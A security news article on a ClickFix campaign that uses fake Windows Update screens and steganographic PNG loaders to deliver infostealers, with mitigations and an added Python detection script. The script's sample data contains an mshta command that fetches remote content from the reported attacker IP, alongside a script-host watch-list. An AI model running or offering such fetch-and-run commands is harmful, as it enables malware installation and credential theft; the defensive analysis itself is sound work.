Cybercriminals Use Fake Windows Update Screens for Steganography-Based Malware Attack

In a concerning development, cybercriminals have refined their tactics to distribute malware by leveraging counterfeit Windows Update screens combined with steganography—a method of concealing code within image files. This sophisticated approach aims to deceive users into executing malicious commands, leading to the installation of information-stealing malware such as LummaC2 and Rhadamanthys.

Understanding the ClickFix Technique

The foundation of this attack lies in a social engineering method known as ClickFix. In this scheme, users are prompted to press the Windows key and R simultaneously, opening the Run dialog box. Unbeknownst to them, a malicious command has been automatically copied to their clipboard. When users paste and execute this command, they inadvertently initiate the malware installation process.

Initially, attackers employed generic Human Verification prompts to lure users. However, recent observations by cybersecurity firm Huntress reveal a shift towards more convincing full-screen Windows Update imitations. These fake update screens display realistic progress messages, enhancing their credibility and increasing the likelihood of user compliance.

The Role of Steganography in Malware Deployment

A distinctive aspect of this campaign is its use of steganography to embed malicious code within PNG image files. The attack sequence unfolds as follows:

1. Initiation via mshta.exe: The command the user pastes into the Run dialog launches mshta.exe, a legitimate Windows utility for executing HTML applications, and hands it a URL whose host is a hex-encoded IP address. mshta.exe fetches that URL, initiating the next stage of the attack.

2. Execution of Obfuscated PowerShell Scripts: The process continues with the download and execution of obfuscated PowerShell scripts. These scripts are designed to evade detection by traditional security measures.

3. Deployment of the Steganographic Loader: A .NET-based loader is then executed, which decrypts an embedded PNG image resource. This loader extracts raw bitmap data from the image, reconstructing shellcode hidden within a specific color channel. A custom XOR-based routine is employed to recover the payload in memory.

4. Injection into System Processes: The recovered shellcode is Donut-packed—a technique for executing .NET assemblies in memory—and injected into a target process, such as explorer.exe. This is achieved through dynamically compiled C# code that utilizes standard Windows APIs like VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread.

This intricate method allows the malware to operate stealthily, blending with legitimate Windows processes and making detection challenging.

Identified Malware Variants

Analyses have identified that this campaign primarily delivers two types of information-stealing malware:

– LummaC2: A sophisticated malware designed to exfiltrate sensitive information from infected systems.

– Rhadamanthys: Another information stealer known for its capability to harvest a wide range of data, including credentials and financial information.

These malware variants pose significant risks to both individual users and organizations by compromising personal and sensitive data.

Infrastructure and Campaign Persistence

Huntress has been monitoring clusters of these ClickFix Windows Update campaigns since early October. Notably, the IP address 141.98.80[.]175 has been repeatedly used, with varying paths such as /tick.odd, /gpsc.dat, and /one.dat for the initial mshta.exe stage. Subsequent PowerShell stages have been hosted on domains like securitysettings[.]live and xoiiasdpsdoasdpojas[.]com, indicating a well-coordinated and persistent attack infrastructure.

These campaigns have continued to surface around the time of Operation Endgame 3.0, the mid-November law-enforcement action that targeted Rhadamanthys’ infrastructure, disrupting servers and seizing domains linked to the stealer. Despite these efforts, researchers observed multiple active domains still serving the Windows Update ClickFix lure, though the Rhadamanthys payload itself appeared to be unavailable.

Mitigation Strategies

Given the reliance of this attack on user interaction with the Run dialog, organizations can implement several measures to mitigate the risk:

– Disable the Windows Run Box: Administrators can disable the Windows Run box via Group Policy or registry settings. For example, configuring the NoRun policy under the Explorer key can prevent users from accessing the Run dialog, thereby reducing the risk of executing malicious commands.

– Monitor for Suspicious Process Activity: Security teams should utilize Endpoint Detection and Response (EDR) telemetry to monitor for instances where explorer.exe spawns mshta.exe, powershell.exe, or other scripting binaries with suspicious command lines.

– User Education and Awareness: Educating users is crucial. Employees should be informed that legitimate CAPTCHA checks or Windows Update processes will never require pasting commands into the Run prompt from a web page.

– Review RunMRU Registry Key: During security investigations, analysts can review the RunMRU registry key, which records recent commands executed via the Run dialog. This can help identify potential ClickFix abuse.
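The following is an added example, not code from Huntress or from the article, that ties three points above together from a detection stance: it normalises the hex-encoded IP host used in the mshta.exe stage back to dotted-quad form so it can be matched against the reported 141.98.80[.]175 indicator, flags explorer.exe spawning a script host that fetches a remote URL (the EDR check), and parses RunMRU entries in their on-disk form (each value holds the command followed by a literal "\1", ordered by MRUList, newest first). The hex spelling 0x8d6250af is that same reported IP re-encoded for the sample; the process events and RunMRU export are constructed, and the script-host list and "known host" matching are assumptions, not the vendor's detection logic.

```python
import ipaddress
import re

KNOWN_STAGE1_HOSTS = {"141.98.80.175"}  # stage-1 host from the report, defanged as 141.98.80[.]175 above
SCRIPT_HOSTS = {"mshta", "powershell", "pwsh", "wscript", "cscript", "cmd"}  # assumed watch-list
URL_RE = re.compile(r"https?://([^/\s:]+)", re.IGNORECASE)

def normalize_host(host: str) -> str:
    """Map hex (0x8d6250af) or plain-integer IPv4 spellings to dotted quad; else lowercase."""
    try:
        n = int(host, 0)  # base 0 accepts 0x-prefixed hex as well as plain decimal
    except ValueError:
        return host.lower()
    return str(ipaddress.IPv4Address(n)) if 0 <= n <= 0xFFFFFFFF else host.lower()

def command_indicators(cmdline: str) -> list[str]:
    """Reasons a command line looks like ClickFix stage 1: script host plus a remote URL."""
    reasons, parts = [], cmdline.strip().split()
    image = parts[0].strip('"').rsplit("\\", 1)[-1].lower().removesuffix(".exe") if parts else ""
    if image in SCRIPT_HOSTS:
        reasons.append("script host " + image)
    for host in URL_RE.findall(cmdline):
        ip = normalize_host(host)
        reasons.append("remote url " + ip + (" (written as %s)" % host if ip != host.lower() else ""))
        if ip in KNOWN_STAGE1_HOSTS:
            reasons.append("known stage-1 host " + ip)
    return reasons

def flag_process_events(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Sysmon-style process creations: explorer.exe spawning a script host that fetches a URL."""
    hits = []
    for ev in events:
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        reasons = command_indicators(ev["CommandLine"])
        kinds = {r.split()[0] for r in reasons}  # "script", "remote" and/or "known"
        if parent == "explorer.exe" and {"script", "remote"} <= kinds:
            hits.append((ev["CommandLine"], reasons))
    return hits

def parse_runmru(values: dict) -> list[str]:
    """RunMRU keeps each Run-dialog entry as '<command>\\1'; MRUList orders them, newest first."""
    return [values[k].rsplit("\\1", 1)[0] for k in values.get("MRUList", "") if k in values]

# Constructed sample telemetry and RunMRU export (not taken from the report).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r'"C:\Windows\System32\mshta.exe" http://0x8d6250af/tick.odd'},
    {"ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r'"C:\Windows\System32\notepad.exe" C:\Users\jdoe\notes.txt'},
]
SAMPLE_RUNMRU = {"MRUList": "ba", "a": r"notepad\1", "b": r"mshta http://0x8d6250af/tick.odd\1"}
```

Running command_indicators over each entry returned by parse_runmru gives the same triage reasons for historical Run-dialog commands as flag_process_events gives for live process telemetry.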

Conclusion

The evolution of cyber threats underscores the importance of vigilance and proactive security measures. By understanding the tactics employed in these sophisticated attacks and implementing robust mitigation strategies, both individuals and organizations can better protect themselves against such deceptive and harmful campaigns.